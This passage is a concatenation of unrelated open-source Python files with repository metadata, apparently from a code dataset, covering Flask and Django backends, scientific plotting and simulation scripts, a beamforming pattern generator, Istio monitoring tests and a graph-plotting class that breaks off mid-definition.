np.random.random(size=(num_points**2,2)) * num_points # Breaking Max-Box-Side-Length continuity points = np.array([ [1,0], [3,2], [4,1], [0,5], [3,6], [5,7] ]) print(points) # Calculate the associated response values values = np.array([[fun(pt) for pt in points]]).T points = np.concatenate((points, values), axis=1) points = points[points[:,1].argsort()] points = points[points[:,0].argsort()] # print(points) if normalize_points: # Normalize the points points[:,2] -= min(points[:,-1]) max_val = max(max(r[:-1]) for r in points) points[:,:2] /= max_val points[:,2] += 1.3 else: min_val = np.min(points[:,:2]) max_val = np.max(points[:,:2]) plot_range = [ plot_range[0] * (max_val - min_val) + min_val, (plot_range[1]-1) * (max_val - min_val) + max_val] print("Constructing mesh...") surf = BoxMesh(func, size) surf.add_points(points, use_max_box) print("Creating visualization...") surf_p = Plot() print(" adding control points...") surf_p.add("Control Points", *(points.T)) print(" adding mesh surface...") surf_p.add_func("Surface", surf, plot_range, plot_range, use_gradient=True, plot_points=plot_points) # surf_p.plot() print(" creating box plot...") boxes_p = Plot() draw_boxes_2D(boxes_p, surf) print(" making HTML...") multiplot([[boxes_p,surf_p]]) # print("Constructing second mesh...") # surf2 = BoxMesh(func, size) # surf2.add_points(points, not use_max_box) # print("Drawing plots...") # boxes_p2 = Plot() # draw_boxes_2D(boxes_p2, surf2) # surf_p2 = Plot() # surf_p2.add("Control Points", *(points.T)) # surf_p2.add_func("Surface", surf2, plot_range, plot_range, use_gradient=True) # multiplot([[boxes_p,surf_p], # [boxes_p2,surf_p2]])
64f33d189625ea147141f4287452b920cda333fb
19b2affa8ed62c2a1e6299ac6de797e602894b16
/backend/src/server/api/stats/at_work.py
0fe49ab0fce6071c837017169c89df887eb97621
[]
no_license
skapin/power-elements
8b0c24869588abe05b46d998e82090bd7e39b3a2
76b1547eeeea521ef655dda134a47f2469990394
refs/heads/master
2023-01-02T19:26:38.072353
2020-05-22T15:54:50
2020-05-22T15:54:50
265,940,649
0
0
null
2020-10-27T22:35:41
2020-05-21T20:03:02
Python
UTF-8
Python
false
false
1,137
py
import logging import json from flask import request, jsonify, abort, Blueprint from flask_restful import Resource, reqparse from config.settings import SETTINGS from common.utils.security import generate_user_token, extract_payload from db.models import Question, Account, Response from common.db.base import Database from flask_restful_swagger import swagger from sqlalchemy import desc, func LOG = logging.getLogger(__name__) class AtWork(Resource): @swagger.operation( notes='Get Stats from account', responseMessages=[ { "code": 200, "message": "Everything went right" }, { "code": 405, "message": "file not found" } ] ) def get(self): with Database(auto_commit=True) as db: at_work_account = db.query(func.count(Account.uniqid)).filter_by(at_work=True).first() at_home_account = db.query(func.count(Account.uniqid)).filter_by(at_work=False).first() return jsonify({'at_work_account': at_work_account[0], 'at_home_account': at_home_account[0]})
49d8a0cb2a3ec05cdb81a281746a484cb2616dcb
b4c0c347cca4856bbdf82c06142ae9cd18e02746
/api/models.py
6ef37b3c1375701f4d646f1685e3a746a8782ab0
[ "MIT" ]
permissive
AanandhiVB/bank-admin-backend
dfb9793eedd6a447d25ad15f3417f4933806a512
cce02c37e06dc2cd72d160f4817ec7658714831e
refs/heads/main
2023-05-05T15:19:35.241460
2021-05-23T18:49:22
2021-05-23T18:49:22
370,040,798
0
0
null
null
null
null
UTF-8
Python
false
false
706
py
from django.db import models # Create your models here. class Bank(models.Model): name = models.CharField(max_length=100, blank=False, null=False) class Branch(models.Model): bank = models.ForeignKey(Bank,on_delete=models.CASCADE) ifsc = models.CharField(max_length=100, blank=False, null=False) branch = models.CharField(max_length=100, blank=False, null=False) address = models.CharField(max_length=200, blank=False, null=False) city = models.CharField(max_length=100, blank=False, null=False) district = models.CharField(max_length=100, blank=False, null=False) state = models.CharField(max_length=100, blank=False, null=False)
241a1492ddab027c0632271bea37fbd696a507f5
344caf79f5640b2b6d86f5c70a92b0358e3bfc15
/dynamics/gravity/projectile.py
3eceac1460803d0e6318a8e339460c43d4a8b0ba
[ "BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference" ]
permissive
brettrhenderson/PySims
8a70712864a38b3090a14ef8e45751f719d656c1
07fe37d1a61ef3b8f3d10ef9f393b5144acc1b96
refs/heads/master
2022-11-16T13:33:20.227467
2020-06-29T01:06:39
2020-06-29T01:06:39
275,475,316
0
0
null
null
null
null
UTF-8
Python
false
false
4,203
py
import numpy as np import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation # gravitational constant 6.67408 × 10-11 m3 kg-1 s-2 G = 6.67408E-11 class Projectile: def __init__(self, h0, v0, rg=6.731e6, g=9.8, dt=1.0, nmax=300000): self.dt = dt self.h0 = h0 self.g = g self.rg = rg self.nmax = nmax self.xg = np.array([0, -rg]) self.x = [np.array([0, h0])] self.v = [v0] self.a = [self.accel_(self.x[0])] def accel_(self, r): r_vec = self.xg - r r_mag = np.linalg.norm(r_vec) return self.g * r_vec / r_mag def step_(self): self.x.append(self.x[-1] + self.v[-1] * self.dt + 0.5 * self.a[-1] * (self.dt**2)) new_acc = self.accel_(self.x[-1]) self.v.append(self.v[-1] + 0.5 * (self.a[-1] + new_acc) * self.dt) self.a.append(new_acc) def compute_trajectory(self): while (np.linalg.norm(self.x[-1] - self.xg) > self.rg) and (len(self.x) < self.nmax): #while (self.x[-1][1] > 0) and (len(self.x) < self.nmax): self.step_() def animate(self, adjust_axes=False, interval=50, figsize=(10,8)): x = np.array(self.x) # Plot Stuff fig = plt.figure(figsize=figsize) ax = fig.add_subplot(111, autoscale_on=False) path, = ax.plot([], [], 'b-', markersize=4, alpha=0.4) proj, = ax.plot([], [], 'r-', markersize=4) # ground = ax.hlines(0, self.x[0] - 10, self.x[-1] + 10) ground, = ax.plot(x[:, 0], np.sqrt(self.rg**2 - x[:, 0]**2) - self.rg, 'k-') textx = ax.text(0.8, 0.9, f'x = {self.x[0][0]:.2f}m', horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) texty = ax.text(0.8, 0.8, f'y = {self.x[0][1]:.2f}m', horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) textg = ax.text(0.8, 0.7, f'h = {np.linalg.norm(self.x[0] - self.xg) - self.rg:.2f}m', horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) textv = ax.text(0.8, 0.6, f'v = {np.linalg.norm(self.v[0]):.1f}m/s', horizontalalignment='center', verticalalignment='center', transform=ax.transAxes) ln = [proj, path, ground, textv, textx, texty, textg] def init_plot(): if adjust_axes: ax.set_xlim(self.x[0][0] - 2, self.x[0][0] + 10) ax.set_ylim(-self.h0 * 2, self.x[0][1] + 10) else: ax.set_xlim(self.x[0][0] - 2, self.x[-1][0] + 10) ax.set_ylim(-self.h0 * 2, self.x[int(len(self.x)/2)][1] + 10) plt.axis('off') return ln def update_plot(i): # get current vector of jav javv = 2.3 * (x[i] - x[i-1]) / np.linalg.norm(x[i] - x[i-1]) jav = np.array([x[i] - javv/2, x[i] + javv/2]) # proj.set_data(x[i, 0], x[i, 1]) proj.set_data(jav[:, 0], jav[:, 1]) path.set_data(x[:i+1, 0], x[:i+1, 1]) # adjust text textx.set_text(f'x = {x[i, 0]:.2f}m') texty.set_text(f'y = {x[i, 1]:.2f}m') textv.set_text(f'v = {np.linalg.norm(self.v[i]):.1f}m/s') textg.set_text(f'h = {np.linalg.norm(self.x[i] - self.xg) - self.rg:.2f}m') if adjust_axes: # adjust axes if needed if self.x[i][0] > ax.get_xlim()[1] - 10: ax.set_xlim([ax.get_xlim()[0], x[i, 0] + 10]) if self.x[i][1] > ax.get_ylim()[1] - 10: ax.set_ylim([ax.get_ylim()[0], x[i, 1] + 10]) return ln return FuncAnimation(fig, update_plot, init_func=init_plot, frames=len(self.x), interval=interval, blit=True, repeat=False) if __name__ == "__main__": h0 = 2 v0 = np.array([26, 15]) ball = Projectile(h0, v0, rg=6.731e6, g=9.8, dt=0.01, nmax=30000) ball.compute_trajectory() ani = ball.animate(adjust_axes=False, interval=10, figsize=(15, 6)) # ani.save('projectile.mp4', extra_args=['-vcodec', 'libx264']) plt.show()
b3f61b006eab4de683eabd97c232a3538ac61f90
eb40d59aaceed26160aae48f6abc9dca0ab4bd1e
/project3/settings.py
4008cf7547ce3130b5ed4f000c533160287de206
[]
no_license
scarlos723/mail
8936c92fe6ebb1f882334f660c88683b46a879ba
e00521240592ac13ff52dbfd6373e69011d8a36c
refs/heads/master
2023-01-01T06:56:47.189807
2020-10-25T07:38:44
2020-10-25T07:38:44
305,962,361
0
0
null
null
null
null
UTF-8
Python
false
false
3,253
py
""" Django settings for project3 project. Generated by 'django-admin startproject' using Django 3.0.2. For more information on this file, see https://docs.djangoproject.com/en/3.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.0/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '05$4$3aew(8ywondz$g!k4m779pbvn9)euj0zp7-ae*x@4pxr+' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'mail', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'project3.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'project3.wsgi.application' # Database # https://docs.djangoproject.com/en/3.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } AUTH_USER_MODEL = 'mail.User' # Password validation # https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.0/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.0/howto/static-files/ # PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__)) # STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static') STATIC_URL = '/static/'
fe6b4e9a2fa21b14b8a757cf8fcbf9e6df72eef4
220a1bd2b0d26475dfa357eef7f4955d13f5560f
/hwk_11_ve/bin/pip
9a6395f55793276a645ebfa09e0e7550d776e4bf
[]
no_license
togaryo/SI507_F18_HW11_Flask
5cefc8be0b9a1b38e5d28d446dd9d8f0ffc0fc2d
462ffb87b440767922c71a8d805e9a97efb6f615
refs/heads/master
2020-04-09T05:58:24.015258
2018-12-03T03:28:19
2018-12-03T03:28:19
160,089,314
0
0
null
null
null
null
UTF-8
Python
false
false
261
#!/Users/ryo6122/Desktop/SI507/week12/hw11/hwk_11_ve/bin/python # -*- coding: utf-8 -*- import re import sys from pip._internal import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
0dea56dcecce21edb733840c1fb5b8adbf4b9c65
a43cb9427265e8d7f2202bf88578401beb90e47a
/url_reducer/views.py
f26495eee7e56dd543b9890abfd1cd892832fbfe
[]
no_license
danielngd/url_reduce
7bf8896f0dcdc62acf7ec5a5df9fe68019126b3e
8626344c19ea69b7e4b21517edb83a56ffcd90e5
refs/heads/main
2023-05-15T07:50:38.757052
2021-06-07T15:27:55
2021-06-07T15:27:55
369,886,757
0
0
null
null
null
null
UTF-8
Python
false
false
2,096
py
from django.db.models.fields import SlugField from django.shortcuts import redirect, render from django.http import HttpResponse from django.db.models.functions import TruncDate from django.db.models import Count import string import random # Create your views here. from url_reducer.models import UrlRedirect, Urllog def home(requisicao): return render(requisicao, 'url_reducer/index.html') def criar_slug(N:int) -> str: return ''.join(random.SystemRandom().choice( string.ascii_letters + \ string.digits) for _ in range(N) ) def processar(requisicao): url = requisicao.POST.get('url') url_redirect = UrlRedirect.objects.filter(destino=url) if not url_redirect: url_redirect = UrlRedirect.objects.create( destino = url, slug = criar_slug(6) ) else: url_redirect = url_redirect[0] return redirect('/relatorios/{slug}'.format(slug=url_redirect.slug)) def relatorios(requisicao, slug): url_redirect = UrlRedirect.objects.get(slug=slug) url_reduzida = requisicao.build_absolute_uri(f'/{slug}') redirecionamentos_por_data = list( UrlRedirect.objects.filter( slug = slug ).annotate( data = TruncDate('logs__criado_em') ).annotate( cliques = Count('data') ).order_by('data') ) contexto = { 'reduce': url_redirect, 'url_reduzida': url_reduzida, 'redirecionamentos_por_data': redirecionamentos_por_data, 'total_cliques': sum(r.cliques for r in redirecionamentos_por_data) } return render(requisicao, 'url_reducer/relatorio.html', contexto) def redirecionar(requisicao, slug): url_redirect = UrlRedirect.objects.get(slug=slug) Urllog.objects.create( origem = requisicao.META.get('HTTP_REFERER'), user_agent = requisicao.META.get('HTTP_USER_AGENT'), host = requisicao.META.get('HTTP_HOST'), ip = requisicao.META.get('REMOTE_ADDR'), url_redirect = url_redirect ) return redirect(url_redirect.destino)
de83d9b23e9cd7655d6124d3683b4051a0b582ed
2ec662ebc944b9fcc4a1b10fb61bb091b0d45c57
/Code_Pattern/beamforming_pattern_gen_circ_array.py
91f6fadf0dbe1f3d0e578c59edeb5daafdf4bac4
[ "MIT" ]
permissive
tomhirsh/acoustic_beamforming
99e98b13b6f87dede2498cb2d6c160607d307808
f0f4222c6328566f2436313a4d430c4ad6080d59
refs/heads/main
2023-07-11T05:12:22.387690
2021-08-15T11:42:49
2021-08-15T11:42:49
395,537,242
0
0
MIT
2021-08-13T06:01:26
2021-08-13T06:01:26
null
UTF-8
Python
false
false
4,912
py
"""This module plots and outputs beamforming pattern of a circular phased array. Author: Tom Hirshberg """ import numpy as np import matplotlib.pyplot as plt import argparse from beamforming_pattern_gen import * # Get amplitude law def get_amplitude_law(N, law = 'constant', minAmp = 1): """Computes an amplitude law given N (number of elements), law (type of law) and minAmp (minimum amplitude). """ amp_law = [] for n in range(N): if law == 'constant': amp_law.append(1) elif law == 'linear': beta = 0 if N%2!=0 else (1-minAmp)/(N-1) amp_law.append((minAmp-1-beta) * 2/(N-1) * abs(n - (N-1) / 2) + 1 + beta) elif law == 'log_linear': beta = 0 if N%2!=0 else (1-lineartodB(minAmp))/(N-1) amp_law.append(dBtoLinear((lineartodB(minAmp)-beta) * 2/(N-1) * abs(n-(N-1)/2) + beta)) elif law == 'poly2': beta = 0 if N%2!=0 else (1-minAmp)/(N-1) amp_law.append((minAmp-1-beta) * (2/(N-1))**2 * (n-(N-1)/2)**2 + 1 + beta**2) elif law == 'poly3': beta = 0 if N%2!=0 else (1-minAmp)/(N-1) amp_law.append((minAmp-1-beta) * (2/(N-1))**3 * abs(n-(N-1)/2)**3 + 1 + beta**3) return np.array(amp_law) # Get phase law def get_circular_phase_law(num_sources, alpha, R, wavelength, phi): phase_law = [] for n in range(num_sources): phase_law.append(2 * np.pi / wavelength * (2 * R * np.sin(n * alpha)) * np.sin(phi + n * alpha)) return phase_law def get_circular_pattern(num_sources, R, wavelength, phi, logScale=True, ccw=True): alpha = 2 * np.pi / num_sources amp_law = np.ones(num_sources) phase_law = get_circular_phase_law(num_sources, alpha, R, wavelength, phi) theta = np.arange(0, 2*np.pi, np.radians(0.1)) mag = [] for theta_i in theta: im = re = 0 # Phase shift due to off-boresight angle # Compute sum of effects of elements for n in range(num_sources): if ccw: factor = n * alpha else: factor = -n * alpha psi = np.sin(theta_i + n * alpha ) coeff = 2 * np.pi / wavelength * (2 * R * np.sin(n * alpha)) # using constant amplitude law for simplicity #TODO: will be optimized in pyRoomAcoustics im += np.sin(coeff * (psi + np.sin(phi + factor))) re += np.cos(coeff * (psi + np.sin(phi + factor))) magnitude = np.sqrt(re**2 + im**2)/num_sources if logScale: magnitude = 20*np.log10(magnitude) mag.append(magnitude) return theta, mag, amp_law, phase_law def plot_pattern(theta, mag, amp_law, phase_law, polar=False, output_file=None): """Plots a magnitude pattern, amplitude law and phase law. Optionnally, it can export the pattern to output_file. """ # Default size & dpi plt.figure(figsize=(10,4),dpi=100) # Plot pattern if polar: ax = plt.subplot(131, polar=True) ax.plot(theta, mag) ax.set_theta_zero_location("N") ax.set_thetalim(0, 2*np.pi) else: ax = plt.subplot(131) ax.plot(theta,mag) ax.grid(True) ax.set_xlim([0, 2*np.pi]) ax.set_xlabel('radinas') plt.ylim(top=0) plt.title("Antenna pattern - circular array") # Plot amplitude law ax = plt.subplot(132) ax.plot(range(len(amp_law)), amp_law, marker='o') ax.set_ylim([0,1]) plt.title("Amplitude law") print("Amplitude law:") print(amp_law) # Plot phase law ax = plt.subplot(133) plt.title("Phase law") ax.plot(range(len(phase_law)),np.rad2deg(phase_law), marker='o') print("Phase law:") print(phase_law) # Show and save plot if output_file is not None: plt.savefig(output_file + '.png') np.savetxt(output_file + '.txt', np.transpose([theta,mag]), delimiter='\t', header="Angle [deg]\tMagnitude [dB]") plt.show() def main(args): # Parameters N = args.number_elements # Elements c = args.wave_celerity #m/s f = args.frequency #Hz phi = np.radians(args.steering_angle) #deg polar = args.polar #True=polar patter, False=cartesian pattern logScale = args.log_scale #True=output in dB, False=linear output output_file = 'pattern_' + str(N) if args.save_output else None wavelength = c/f #m theta, mag, amp_law, phase_law = get_circular_pattern(num_sources=N, R=0.1, wavelength=wavelength, phi=phi, logScale=logScale) plot_pattern(theta, mag, amp_law,phase_law,polar,output_file=output_file) if __name__ == '__main__': args = get_args() main(args)
8f35b00ec2863b4bc1ed7fe3a963aa23f295757d
b57b0a14df5c6841f04cccb7b02ad04afbca18f8
/istio/tests/test_istio_1_5.py
3b34e35c23c2b215618191c3b6ee30ea493de837
[ "AFL-3.0", "BSD-3-Clause-Modification", "LGPL-3.0-only", "Unlicense", "LGPL-2.1-only", "BSD-3-Clause", "Apache-2.0", "BSD-2-Clause" ]
permissive
zeroc0d3/integrations-core
d9c99803c049668b7f9f9c796d338e343d3d46ee
634d567f3c38d32aabb3f4c16b50bcfa8a4ae0fb
refs/heads/master
2021-09-28T18:37:00.650406
2021-09-13T11:59:45
2021-09-13T11:59:45
199,758,958
0
0
BSD-3-Clause
2019-07-31T02:01:25
2019-07-31T02:01:24
null
UTF-8
Python
false
false
3,149
py
# (C) Datadog, Inc. 2020-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import requests_mock from datadog_checks.dev.utils import get_metadata_metrics from datadog_checks.istio import Istio from . import common from .utils import _assert_tags_excluded, get_response def test_legacy_istiod(aggregator): """ Test the istiod deployment endpoint for v1.5+ check """ check = Istio('istio', {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE]) with requests_mock.Mocker() as metric_request: metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt')) check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE) for metric in common.ISTIOD_METRICS: aggregator.assert_metric(metric) aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True) aggregator.assert_all_metrics_covered() def test_legacy_proxy_mesh(aggregator): """ Test proxy mesh check """ check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_MESH_INSTANCE]) with requests_mock.Mocker() as metric_request: metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt')) check.check(common.MOCK_LEGACY_MESH_INSTANCE) for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5: aggregator.assert_metric(metric) _assert_tags_excluded(aggregator, []) aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True) aggregator.assert_all_metrics_covered() def test_istio_proxy_mesh_exclude(aggregator): """ Test proxy mesh check """ exclude_tags = ['destination_app', 'destination_principal'] instance = common.MOCK_LEGACY_MESH_INSTANCE instance['exclude_labels'] = exclude_tags check = Istio(common.CHECK_NAME, {}, [instance]) with requests_mock.Mocker() as metric_request: metric_request.get('http://localhost:15090/metrics', text=get_response('1.5', 'istio-proxy.txt')) check.check(instance) for metric in common.LEGACY_MESH_METRICS + common.MESH_MERICS_1_5: aggregator.assert_metric(metric) _assert_tags_excluded(aggregator, exclude_tags) aggregator.assert_metrics_using_metadata(get_metadata_metrics(), check_submission_type=True) aggregator.assert_all_metrics_covered() def test_legacy_version_metadata(datadog_agent): check = Istio(common.CHECK_NAME, {}, [common.MOCK_LEGACY_ISTIOD_INSTANCE]) check.check_id = 'test:123' with requests_mock.Mocker() as metric_request: metric_request.get('http://localhost:8080/metrics', text=get_response('1.5', 'istiod.txt')) check.check(common.MOCK_LEGACY_ISTIOD_INSTANCE) # Use version mocked from istiod 1.5 fixture MOCK_VERSION = '1.5.0' major, minor, patch = MOCK_VERSION.split('.') version_metadata = { 'version.scheme': 'semver', 'version.major': major, 'version.minor': minor, 'version.patch': patch, 'version.raw': MOCK_VERSION, } datadog_agent.assert_metadata('test:123', version_metadata)
d66f55673cf2057f85cac998e95c9393c4a3fc95
e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f
/indices/neal.py
a9b23af628c29baef5be38fc3499691d0ef5fd97
[]
no_license
psdh/WhatsintheVector
e8aabacc054a88b4cb25303548980af9a10c12a8
a24168d068d9c69dc7a0fd13f606c080ae82e2a6
refs/heads/master
2021-01-25T10:34:22.651619
2015-09-23T11:54:06
2015-09-23T11:54:06
42,749,205
2
3
null
2015-09-23T11:54:07
2015-09-18T22:06:38
Python
UTF-8
Python
false
false
274
py
ii = [('CookGHP3.py', 1), ('WilbRLW4.py', 1), ('AdamWEP.py', 1), ('ClarGE2.py', 3), ('AdamHMM.py', 1), ('ClarGE.py', 11), ('GilmCRS.py', 1), ('DaltJMA.py', 1), ('GodwWLN.py', 2), ('SoutRD2.py', 3), ('WheeJPT.py', 2), ('MereHHB.py', 1), ('DibdTRL.py', 1), ('SadlMLP2.py', 1)]
618c8454e39c26836efdcd1b025c4b926ae44d83
67ef0a3f31c141e0cb156cb3d278091e63b32dfd
/0x07-python-test_driven_development/4-print_square.py
5c4a6a2d4961caeeb26163218545e2b26947a288
[]
no_license
Orcha02/holbertonschool-higher_level_programming
7078ac665f027b845a55a8499764cfce78d89eec
1d0136aef388ede1ecbe625b303e07c177fee52e
refs/heads/main
2023-08-22T10:04:56.495834
2021-09-23T02:56:36
2021-09-23T02:56:36
361,823,730
1
2
null
null
null
null
UTF-8
Python
false
false
448
py
#!/usr/bin/python3 """ Function that prints a square """ def print_square(size): """ function that prints a square with the character #. """ if type(size) is not int: raise TypeError("size must be an integer") if size < 0: raise ValueError("size must be >= 0") if type(size) is float and size < 0: raise TypeError("size must be an integer") for i in range(size): print("{}".format("#" * size))
cba11837296d1468a2f7aad89d33ddce44995fda
388e054480b4a26e602b213967e3c4bec9ae96d5
/server.py
2237b54355bd547c3c26e68f67605a0f0f4a4c09
[]
no_license
budinugroho13/Ftp-sederhana
b035211602269e450ffc3552203d96af4e807f7a
cf2accb3faa3921aca37163d35524c6b99eeaff5
refs/heads/master
2022-04-19T14:09:10.748831
2020-04-16T05:18:30
2020-04-16T05:18:30
256,115,679
0
0
null
null
null
null
UTF-8
Python
false
false
1,774
py
# import socket # import tqdm # import os # # ip addres yang digunakan # SERVER_HOST = "0.0.0.0" # SERVER_PORT = 5001 # # menerima 4096 # BUFFER_SIZE = 4096 # SEPARATOR = "<SEPARATOR>" # # membuat socket # # TCP socket # s = socket.socket() # # bind socket sebagai local address # s.bind((SERVER_HOST, SERVER_PORT)) # s.listen(5) # print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}") # # menerima koneksi # client_socket, address = s.accept() # # jika ada user konek akan tereksekusi # print(f"[+] {address} is connected.") # # menerima info file # received = client_socket.recv(BUFFER_SIZE).decode() # filename, filesize = received.split(SEPARATOR) # filename = os.path.basename(filename) # # mengubah string menjad integer # filesize = int(filesize)b # # mulai menerima file dari socket # progress = tqdm.tqdm(range( # filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024) # with open(filename, "wb") as f: # for _ in progress: # bytes_read = client_socket.recv(BUFFER_SIZE) # if not bytes_read: # break # # menulis besaran bytes file yang di terima # f.write(bytes_read) # # update progress bar grafik # progress.update(len(bytes_read)) # client_socket.close() # s.close() import socket # Import socket module s = socket.socket() # Create a socket object host = socket.gethostname() # Get local machine name port = 12345 # Reserve a port for your service. s.connect((host, port)) s.send(b"Hello masbud!") f = open('coba.txt','rb') print ('downloading...') l = f.read(1024) while (l): print ('downloading...') s.send(l) l = f.read(1024) f.close() print ("Done downloading") print (s.recv(1024)) s.close
ee7ad7136607639eb8a04211e9c3183c5cecb2e7
707723ab7908db14c2caa0a3f590bae1ef4ae8ac
/data/ageBuild/rd_btx_ageb.py
beed4c8deebb91f86701de2caeb663ef2bbbd4c8
[]
no_license
mvalari/EXPLUME
a57e9cd320bb7519267af599ae6fa763956b286f
f90d4474ca54e29fec872ea7016a51b93f7a3bcb
refs/heads/master
2020-06-25T01:05:55.354526
2019-03-04T14:21:27
2019-03-04T14:21:27
199,148,481
0
0
null
null
null
null
UTF-8
Python
false
false
1,481
py
import pickle import numpy as np ageBins=[]#=[0, 15, 20, 25, 40, 55, 65, 80] cnsDates=[] comIds=[] #Read once to get comIds, ageBins, and dates f=open('BTX_TD_AGEB_2008.ins','r') for i,ln in enumerate(f): if i>0: comId,sex,age,type,ageB,cnt=ln.split() if comId not in comIds:comIds.append(comId) if age not in ageBins:ageBins.append(age) if ageB not in cnsDates:cnsDates.append(ageB) data2d={} for com in comIds: data2d[com]={} data2d[com]=np.zeros((len(ageBins),len(cnsDates))) ageBins=sorted(ageBins) cnsDates=sorted(cnsDates) f.seek(0) for i,ln in enumerate(f): if i>0: comId,sex,age,type,ageB,cnt=ln.split() data2d[comId][ageBins.index(age),cnsDates.index(ageB)]=data2d[comId][ageBins.index(age),cnsDates.index(ageB)]+int(cnt) f.close() data2dr={} for com in data2d.keys(): data2dr[com]=np.zeros((4,18)) data2dr[com][0,:]=np.array([round(i) for i in 0.25*data2d[com][1,:]]) data2dr[com][1,:]=np.array([round(i) for i in 0.75*data2d[com][1,:]]) data2dr[com][2,:]=data2d[com][2,:]+data2d[com][3,:]+data2d[com][4,:]+data2d[com][5,:] data2dr[com][3,:]=data2d[com][6,:]+data2d[com][7,:] fout=open('BUILDING_AGE_MVAL.ins','w') for com in data2dr.keys(): for date in range(len(cnsDates)): fout.write(com +' ; '+str(int(data2dr[com][0,date])) +' ; '+str(int(data2dr[com][1,date])) +' ; '+str(int(data2dr[com][2,date])) +' ; '+str(int(data2dr[com][3,date])) +' ; '+str(cnsDates[date])+'\n') fout.close()
210775055ec3d9710db431bf6467c57b98377d24
5e260d0cde3e77f310bb80ba48319376c067b989
/Tarea5/GrafoTarea5.py
2740b2c59c96b74a086330da0f78fdb09f8a7ae2
[]
no_license
EvelyGutierrez/Optimizacion-de-flujo-de-redes
4f0674d945ca1ef7305c75e5f81b48e67f3317eb
6f2405847022cc230fcfc9ddbe5a5e9a60cd86d6
refs/heads/master
2021-05-09T09:48:25.294949
2018-05-27T21:14:43
2018-05-27T21:14:43
119,458,630
0
0
null
null
null
null
UTF-8
Python
false
false
10,086
py
from random import random, uniform, randint, gauss, expovariate from math import sqrt, ceil, floor, factorial, cos, sin, pi from datetime import datetime from time import clock def cabecera(aristas, k, eps=True): if eps: print("set term postscript color eps", file = aristas) print("set output 'GrafoGrid.eps'", file = aristas) else: print("set term png", file = aristas) print("set output 'GrafoGrid.png'", file = aristas) print('set xrange [-1:', k , ']', file = aristas) print('set yrange [-1:', k , ']', file = aristas) print('set size square', file = aristas) print('set key off', file = aristas) def pie(destino, aristas): print("plot '{:s}' using 1:2 with points pt 5 ps 1".format(destino), file = aristas) class Grafo: def __init__(self): self.x = dict() self.y = dict() self.nodos = dict() self.aristas = [] self.vecinos = dict() self.peso = 1 self.destino = None def agregaNodos(self,v,x,y): self.nodos[v] = (x,y) if not v in self.vecinos: # vecindad de v self.vecinos[v] = set() # inicialmente no tiene nada with open("GraficaNodos.txt", 'a') as archivo: print(x,y,v, file = archivo) def puntos(self, dest, k): self.destino = dest with open(self.destino, 'w') as puntos: it= 0 for i in range(k): for j in range(k): x = i y = j self.agregaNodos(it,x,y) it += 1 # print("nodos") #print(self.nodos) def Grafica(self, plot, k): # imprimiendo el grafo con aristas assert self.destino is not None with open(plot, 'w') as puntos: cabecera(puntos, k) num = 1 for (v, w, p, c) in self.aristas: (x1, y1) = self.nodos[v] (x2, y2) = self.nodos[w] flecha = "set arrow {:d} from {:f}, {:f} to {:f}, {:f} lt 3 lw {:f} lc rgb '{:s}' nohead ".format(num,x1,y1,x2,y2,p, c) print(flecha, file=puntos) num += 1 pie(self.destino, puntos) print(len(self.aristas)) def GraficaNodos(self, plot, k): with open(plot, 'w') as puntos: cabecera(puntos, k) puntoss = "plot 'GraficaNodos.txt' with points pt 4" print(puntoss, file=puntos) def 